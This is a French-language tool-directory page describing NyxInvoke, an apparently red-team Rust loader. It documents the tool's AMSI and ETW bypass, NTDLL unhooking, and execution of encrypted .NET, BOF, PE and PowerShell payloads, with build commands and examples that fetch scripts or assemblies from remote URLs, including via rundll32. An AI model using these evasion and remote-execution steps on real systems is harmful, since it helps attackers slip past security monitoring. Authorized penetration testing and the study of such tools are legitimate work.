Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
NyxInvoke — NyxInvoke est un outil CLI en Rust permettant d'exécuter des assemblys .NET, des scripts PowerShell et des BOFs, avec des fonctionnalités de contournement AMSI et ETW sans patch et une prise en charge du dual-build. | Kitploit
Outils/GitHubGitHub/blacksnufkin/nyxinvoke
ExploitationÉvasion IDS/IPSShellcodePost-ExploitationTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubblacksnufkin/nyxinvoke

NyxInvoke

NyxInvoke est un outil CLI en Rust permettant d'exécuter des assemblys .NET, des scripts PowerShell et des BOFs, avec des fonctionnalités de contournement AMSI et ETW sans patch et une prise en charge du dual-build.

243302il y a 1 anVérifié par Kitploit
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

NyxInvoke

NyxInvoke est un outil polyvalent basé sur Rust conçu pour exécuter des assemblys .NET, des commandes/scripts PowerShell, des Beacon Object Files (BOF) et des fichiers PE, avec des capacités intégrées de Ntdll Unhooking et de contournement AMSI et ETW sans patch. Il peut être compilé aussi bien en exécutable autonome qu'en DLL.

Fonctionnalités

  • Exécuter des assemblys .NET
  • Exécuter des commandes ou scripts PowerShell
  • Charger et exécuter des Beacon Object Files (BOF)
  • Charger et exécuter des fichiers PE (EXE)
  • Contournement AMSI (Anti-Malware Scan Interface) sans patch intégré
  • Contournement ETW (Event Tracing for Windows) sans patch intégré
  • Déshook NTDLL intégré sans déclencher le callback "PspCreateProcessNotifyRoutine"
  • Prise en charge des payloads chiffrés avec déchiffrement AES
  • Options d'entrée flexibles : fichiers locaux, URL ou données compilées
  • Prise en charge de double compilation : peut être compilé en exécutable ou en DLL

Compilation

NyxInvoke peut être compilé aussi bien en exécutable qu'en DLL. Utilisez les commandes suivantes :

Exécutable

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

Pour inclure des données CLR, BOF ou PE compilées, ajoutez les fonctionnalités correspondantes :

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke

ou

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib

Utilisation

Mode Exécutable

L'exécutable prend en charge trois modes de fonctionnement principaux :

  1. Mode CLR (exécution d'assembly .NET)
  2. Mode PowerShell
  3. Mode BOF (exécution de Beacon Object File)
  4. Mode PE (exécution de fichier PE)

Syntaxe générale

root@kitploit:~
NyxInvoke.exe <mode> [OPTIONS]

Où <mode> est l'un des suivants : clr, ps, bof ou pe.

Mode DLL

Lorsqu'il est compilé en DLL, NyxInvoke peut être exécuté à l'aide de rundll32. La syntaxe est :

root@kitploit:~
rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

Options par mode

  1. Mode CLR :
root@kitploit:~
Execute Common Language Runtime (CLR) assemblies

Usage: NyxInvoke.exe clr [OPTIONS]

Options:
  -a, --args <ARGS>...            Arguments to pass to the assembly
  -b, --base <URL_OR_PATH>        Base URL or path for resources
  -k, --key <KEY_FILE>            Path to the encryption key file
  -i, --iv <IV_FILE>              Path to the initialization vector (IV) file
  -f, --assembly <ASSEMBLY_FILE>  Path or URL to the encrypted assembly file to execute
  -u, --unencrypted               Whether the assembly is unencrypted (default is encrypted)
  -h, --help                      Print help (see more with '--help')

Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Mode BOF :
root@kitploit:~
Execute Beacon Object Files (BOF)

Usage: NyxInvoke.exe bof [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the BOF
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --bof <BOF_FILE>      Path or URL to the encrypted BOF file to execute
  -u, --unencrypted         Whether the BOF is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Mode PE :
root@kitploit:~
Execute Portable Executable (PE) files

Usage: NyxInvoke.exe pe [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the PE
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --pe <PE_FILE>        Path or URL to the encrypted PE file to execute
  -u, --unencrypted         Whether the PE is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Mode PowerShell :
root@kitploit:~
Execute PowerShell commands or scripts

Usage: NyxInvoke.exe ps [OPTIONS]

Options:
  -c, --command <PS_COMMAND>  PowerShell command to execute
  -s, --script <PS_SCRIPT>    Path or URL to the PowerShell script to execute
  -h, --help                  Print help (see more with '--help')

Examples:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

Exemples

Mode Exécutable

  1. Mode CLR (exécution à distance) :

    root@kitploit:~
    NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. Mode PowerShell (exécution de script) :

    root@kitploit:~
    NyxInvoke.exe ps --script C:\path\to\script.ps1
    
  3. Mode BOF (exécution locale) :

    root@kitploit:~
    NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
    
  4. Mode PE (exécution compilée) :

    root@kitploit:~
    NyxInvoke.exe pe --args arg1
    

Mode DLL

  1. Mode CLR (exécution à distance) :

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. Mode PowerShell (exécution directe de commande) :

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
    
  3. Mode BOF (exécution compilée) :

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
    
  4. Mode PE (exécution locale non chiffrée) :

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2
    

Ressources de test

Dans le répertoire resources, vous trouverez plusieurs fichiers pour tester les fonctionnalités de NyxInvoke :

  1. Assembly CLR chiffré (Seatbelt) :

    • Fichier : clr_data.enc
    • Description : Une version chiffrée de l'outil Seatbelt, un projet C# pour collecter des informations système.
    • Exemple d'utilisation :
      root@kitploit:~
      NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
      
  2. BOF chiffré (liste de répertoires) :

    • Fichier : bof_data.enc
    • Description : Un Beacon Object File chiffré qui liste les permissions utilisateur pour le fichier spécifié, avec prise en charge des jokers.
    • Exemple d'utilisation :
      root@kitploit:~
      NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
      
  3. PE chiffré (boîte de message) :

    • Fichier : pe_data.enc
    • Description : Un fichier PE chiffré qui affiche une boîte de message.
    • Exemple d'utilisation :
      root@kitploit:~
      NyxInvoke.exe pe
      
  4. PowerShell (boîte de message) :

    • Fichier : ps.ps1
    • Description : Un script PowerShell qui affiche une boîte de message.
    • Exemple d'utilisation :
      root@kitploit:~
      NyxInvoke.exe ps -s http://example.com/ps.ps1
      

Capture d'écran

  • Exécution CLR compilée en DLL

Capture d'écran 2024-09-18 123147

  • Exécution BOF à distance depuis un EXE

Capture d'écran 2024-09-18 123410

  • Exécution EXE compilée en DLL

pe

  • Exécution de script PowerShell depuis une DLL

Capture d'écran 2024-09-18 123547

Mentions légales

Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Assurez-vous de disposer des autorisations appropriées avant de l'utiliser dans tout environnement.

Crédits

  • @yamakadi pour le projet clroxide
  • @hakaioffsec pour le projet coffee
Télécharger l’outil